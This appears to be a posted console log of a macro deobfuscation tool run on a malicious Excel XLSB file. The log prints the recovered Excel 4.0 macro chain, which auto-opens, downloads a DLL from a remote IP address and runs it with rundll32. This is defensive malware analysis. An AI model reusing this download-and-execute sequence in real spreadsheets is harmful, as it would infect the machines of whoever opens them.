dissectmalware

XLSB - Result

Oct 18th, 2020
  1. C:\Users\user\AppData\Local\Programs\Python\Python36-32\python.exe C:/Users/user/Downloads/last/XLMMacroDeobfuscator_new/XLMMacroDeobfuscator/deobfuscator.py -f C:\Users\user\Downloads\7c309387537899f2c0989dcdcc65e21bff85588343800fbbee0d8d36f7aeb155.xlsb
  2.  
  3. _ _______
  4. |\ /|( \ ( )
  5. ( \ / )| ( | () () |
  6. \ (_) / | | | || || |
  7. ) _ ( | | | |(_)| |
  8. / ( ) \ | | | | | |
  9. ( / \ )| (____/\| ) ( |
  10. |/ \|(_______/|/ \|
  11. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  12. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  13. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  14. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  15. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  16. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  17. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  18. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  19.  
  20.  
  21. XLMMacroDeobfuscator(v0.1.5) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  22.  
  23. File: C:\Users\user\Downloads\7c309387537899f2c0989dcdcc65e21bff85588343800fbbee0d8d36f7aeb155.xlsb
  24.  
  25. Unencrypted xlsb file
  26.  
  27. [Loading Cells]
  28. auto_open: auto_open->WSH!$IM$497
  29. [Starting Deobfuscation]
  30. CELL:IM497 , FullEvaluation , $E$456()
  31. CELL:E456 , FullEvaluation , SET.NAME(lynumxcbqnhz,http://205.185.113.20/cXQT5g)
  32. CELL:E457 , FullEvaluation , SET.NAME(wspntpbftoqz,$BB$54)
  33. CELL:E458 , FullEvaluation , $GZ$12()
  34. CELL:GZ12 , FullEvaluation , FORMULA(http://205.185.113.20/cXQT5g,$BB$54)
  35. CELL:E459 , FullEvaluation , RUN(WSH!GV439)
  36. CELL:GV439 , FullEvaluation , SET.NAME(lynumxcbqnhz,C:\nMEzMcr\NBKhcGI\zalfxuR.dll,DllRegisterServer)
  37. CELL:GV440 , FullEvaluation , SET.NAME(wspntpbftoqz,$AQ$173)
  38. CELL:GV441 , FullEvaluation , $GZ$12()
  39. CELL:GZ12 , FullEvaluation , FORMULA(C:\nMEzMcr\NBKhcGI\zalfxuR.dll,DllRegisterServer,$AQ$173)
  40. CELL:GV442 , FullEvaluation , RUN(WSH!IL434)
  41. CELL:IL434 , FullEvaluation , SET.NAME(lynumxcbqnhz,C:\nMEzMcr\NBKhcGI\zalfxuR.dll)
  42. CELL:IL435 , FullEvaluation , SET.NAME(wspntpbftoqz,$HR$332)
  43. CELL:IL436 , FullEvaluation , $GZ$12()
  44. CELL:GZ12 , FullEvaluation , FORMULA(C:\nMEzMcr\NBKhcGI\zalfxuR.dll,$HR$332)
  45. CELL:IL437 , FullEvaluation , RUN(WSH!R272)
  46. CELL:R272 , FullEvaluation , SET.NAME(lynumxcbqnhz,URLMON)
  47. CELL:R273 , FullEvaluation , SET.NAME(wspntpbftoqz,$BE$21)
  48. CELL:R274 , FullEvaluation , $GZ$12()
  49. CELL:GZ12 , FullEvaluation , FORMULA(URLMON,$BE$21)
  50. CELL:R275 , FullEvaluation , RUN(WSH!AQ366)
  51. CELL:AQ366 , FullEvaluation , SET.NAME(lynumxcbqnhz,URLDownloadToFileA)
  52. CELL:AQ367 , FullEvaluation , SET.NAME(wspntpbftoqz,$CK$8)
  53. CELL:AQ368 , FullEvaluation , $GZ$12()
  54. CELL:GZ12 , FullEvaluation , FORMULA(URLDownloadToFileA,$CK$8)
  55. CELL:AQ369 , FullEvaluation , RUN(WSH!EM216)
  56. CELL:EM216 , FullEvaluation , SET.NAME(lynumxcbqnhz,JJCCJJ)
  57. CELL:EM217 , FullEvaluation , SET.NAME(wspntpbftoqz,$DF$227)
  58. CELL:EM218 , FullEvaluation , $GZ$12()
  59. CELL:GZ12 , FullEvaluation , FORMULA(JJCCJJ,$DF$227)
  60. CELL:EM219 , FullEvaluation , RUN(WSH!AB224)
  61. CELL:AB224 , FullEvaluation , SET.NAME(lynumxcbqnhz,Shell32)
  62. CELL:AB225 , FullEvaluation , SET.NAME(wspntpbftoqz,$AE$234)
  63. CELL:AB226 , FullEvaluation , $GZ$12()
  64. CELL:GZ12 , FullEvaluation , FORMULA(Shell32,$AE$234)
  65. CELL:AB227 , FullEvaluation , RUN(WSH!FR415)
  66. CELL:FR415 , FullEvaluation , SET.NAME(lynumxcbqnhz,ShellExecuteA)
  67. CELL:FR416 , FullEvaluation , SET.NAME(wspntpbftoqz,$Y$205)
  68. CELL:FR417 , FullEvaluation , $GZ$12()
  69. CELL:GZ12 , FullEvaluation , FORMULA(ShellExecuteA,$Y$205)
  70. CELL:FR418 , FullEvaluation , RUN(WSH!HX379)
  71. CELL:HX379 , FullEvaluation , SET.NAME(lynumxcbqnhz,JJCCCCJ)
  72. CELL:HX380 , FullEvaluation , SET.NAME(wspntpbftoqz,$IC$410)
  73. CELL:HX381 , FullEvaluation , $GZ$12()
  74. CELL:GZ12 , FullEvaluation , FORMULA(JJCCCCJ,$IC$410)
  75. CELL:HX382 , FullEvaluation , RUN(WSH!FM120)
  76. CELL:FM120 , FullEvaluation , SET.NAME(lynumxcbqnhz,Open)
  77. CELL:FM121 , FullEvaluation , SET.NAME(wspntpbftoqz,$BV$426)
  78. CELL:FM122 , FullEvaluation , $GZ$12()
  79. CELL:GZ12 , FullEvaluation , FORMULA(Open,$BV$426)
  80. CELL:FM123 , FullEvaluation , RUN(WSH!FB326)
  81. CELL:FB326 , FullEvaluation , SET.NAME(lynumxcbqnhz,regsvr32.exe)
  82. CELL:FB327 , FullEvaluation , SET.NAME(wspntpbftoqz,$GO$283)
  83. CELL:FB328 , FullEvaluation , $GZ$12()
  84. CELL:GZ12 , FullEvaluation , FORMULA(regsvr32.exe,$GO$283)
  85. CELL:FB329 , FullEvaluation , RUN(WSH!R419)
  86. CELL:R419 , FullEvaluation , SET.NAME(lynumxcbqnhz,rundll32.exe)
  87. CELL:R420 , FullEvaluation , SET.NAME(wspntpbftoqz,$AK$271)
  88. CELL:R421 , FullEvaluation , $GZ$12()
  89. CELL:GZ12 , FullEvaluation , FORMULA(rundll32.exe,$AK$271)
  90. CELL:R422 , FullEvaluation , RUN(WSH!IF482)
  91. CELL:IF482 , FullEvaluation , SET.NAME(lynumxcbqnhz,C:\nMEzMcr)
  92. CELL:IF483 , FullEvaluation , SET.NAME(wspntpbftoqz,$ED$307)
  93. CELL:IF484 , FullEvaluation , $GZ$12()
  94. CELL:GZ12 , FullEvaluation , FORMULA(C:\nMEzMcr,$ED$307)
  95. CELL:IF485 , FullEvaluation , RUN(WSH!FX105)
  96. CELL:FX105 , FullEvaluation , SET.NAME(lynumxcbqnhz,C:\nMEzMcr\NBKhcGI)
  97. CELL:FX106 , FullEvaluation , SET.NAME(wspntpbftoqz,$BY$47)
  98. CELL:FX107 , FullEvaluation , $GZ$12()
  99. CELL:GZ12 , FullEvaluation , FORMULA(C:\nMEzMcr\NBKhcGI,$BY$47)
  100. CELL:FX108 , FullEvaluation , RUN(WSH!AM67)
  101. CELL:AM67 , FullEvaluation , SET.NAME(lynumxcbqnhz,Kernel32)
  102. CELL:AM68 , FullEvaluation , SET.NAME(wspntpbftoqz,$AP$48)
  103. CELL:AM69 , FullEvaluation , $GZ$12()
  104. CELL:GZ12 , FullEvaluation , FORMULA(Kernel32,$AP$48)
  105. CELL:AM70 , FullEvaluation , RUN(WSH!HD278)
  106. CELL:HD278 , FullEvaluation , SET.NAME(lynumxcbqnhz,CreateDirectoryA)
  107. CELL:HD279 , FullEvaluation , SET.NAME(wspntpbftoqz,$DW$422)
  108. CELL:HD280 , FullEvaluation , $GZ$12()
  109. CELL:GZ12 , FullEvaluation , FORMULA(CreateDirectoryA,$DW$422)
  110. CELL:HD281 , FullEvaluation , RUN(WSH!FU460)
  111. CELL:FU460 , FullEvaluation , SET.NAME(lynumxcbqnhz,JCJ)
  112. CELL:FU461 , FullEvaluation , SET.NAME(wspntpbftoqz,$CC$99)
  113. CELL:FU462 , FullEvaluation , $GZ$12()
  114. CELL:GZ12 , FullEvaluation , FORMULA(JCJ,$CC$99)
  115. CELL:FU463 , FullEvaluation , RUN(WSH!IM53)
  116. CELL:IM53 , FullEvaluation , SET.NAME(lynumxcbqnhz,INSENG)
  117. CELL:IM54 , FullEvaluation , SET.NAME(wspntpbftoqz,$FX$188)
  118. CELL:IM55 , FullEvaluation , $GZ$12()
  119. CELL:GZ12 , FullEvaluation , FORMULA(INSENG,$FX$188)
  120. CELL:IM56 , FullEvaluation , RUN(WSH!EN497)
  121. CELL:EN497 , FullEvaluation , SET.NAME(lynumxcbqnhz,DownloadFile)
  122. CELL:EN498 , FullEvaluation , SET.NAME(wspntpbftoqz,$EC$116)
  123. CELL:EN499 , FullEvaluation , $GZ$12()
  124. CELL:GZ12 , FullEvaluation , FORMULA(DownloadFile,$EC$116)
  125. CELL:EN500 , FullEvaluation , RUN(WSH!Y5)
  126. CELL:Y5 , FullEvaluation , SET.NAME(lynumxcbqnhz,BCCJ)
  127. CELL:Y6 , FullEvaluation , SET.NAME(wspntpbftoqz,$EZ$466)
  128. CELL:Y7 , FullEvaluation , $GZ$12()
  129. CELL:GZ12 , FullEvaluation , FORMULA(BCCJ,$EZ$466)
  130. CELL:Y8 , FullEvaluation , RUN(WSH!EJ144)
  131. CELL:EJ144 , FullEvaluation , SET.NAME(lynumxcbqnhz,NIlBTnHC)
  132. CELL:EJ145 , FullEvaluation , SET.NAME(wspntpbftoqz,$HQ$304)
  133. CELL:EJ146 , FullEvaluation , $GZ$12()
  134. CELL:GZ12 , FullEvaluation , FORMULA(NIlBTnHC,$HQ$304)
  135. CELL:EJ147 , FullEvaluation , RUN(WSH!CJ205)
  136. CELL:CJ205 , FullEvaluation , SET.NAME(lynumxcbqnhz,VBKLJOys)
  137. CELL:CJ206 , FullEvaluation , SET.NAME(wspntpbftoqz,$IB$431)
  138. CELL:CJ207 , FullEvaluation , $GZ$12()
  139. CELL:GZ12 , FullEvaluation , FORMULA(VBKLJOys,$IB$431)
  140. CELL:CJ208 , FullEvaluation , RUN(WSH!BT60)
  141. CELL:BT60 , FullEvaluation , SET.NAME(lynumxcbqnhz,JnBzQTWO)
  142. CELL:BT61 , FullEvaluation , SET.NAME(wspntpbftoqz,$HZ$410)
  143. CELL:BT62 , FullEvaluation , $GZ$12()
  144. CELL:GZ12 , FullEvaluation , FORMULA(JnBzQTWO,$HZ$410)
  145. CELL:BT63 , FullEvaluation , $IM$498()
  146. CELL:IM498 , FullEvaluation , CALL("Kernel32","CreateDirectoryA","JCJ","C:\nMEzMcr",0)
  147. CELL:IM499 , FullEvaluation , CALL("Kernel32","CreateDirectoryA","JCJ","C:\nMEzMcr\NBKhcGI",0)
  148. CELL:IM501 , FullEvaluation , CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://205.185.113.20/cXQT5g","C:\nMEzMcr\NBKhcGI\zalfxuR.dll",0,0)
  149. CELL:IM503 , FullEvaluation , IF($IM$502<>0)
  150. CELL:IM504 , FullEvaluation , CALL("INSENG","DownloadFile","BCCJ","http://205.185.113.20/cXQT5g","C:\nMEzMcr\NBKhcGI\zalfxuR.dll",1)
  151. CELL:IM506 , FullEvaluation , END.IF
  152. CELL:IM508 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","rundll32.exe","C:\nMEzMcr\NBKhcGI\zalfxuR.dll,DllRegisterServer",0,0)
  153. CELL:IM511 , End , HALT()
  154.  
  155. Files:
  156.  
  157. [END of Deobfuscation]
  158. time elapsed: 1.2602179050445557
  159.  
  160. Process finished with exit code 0
  161.  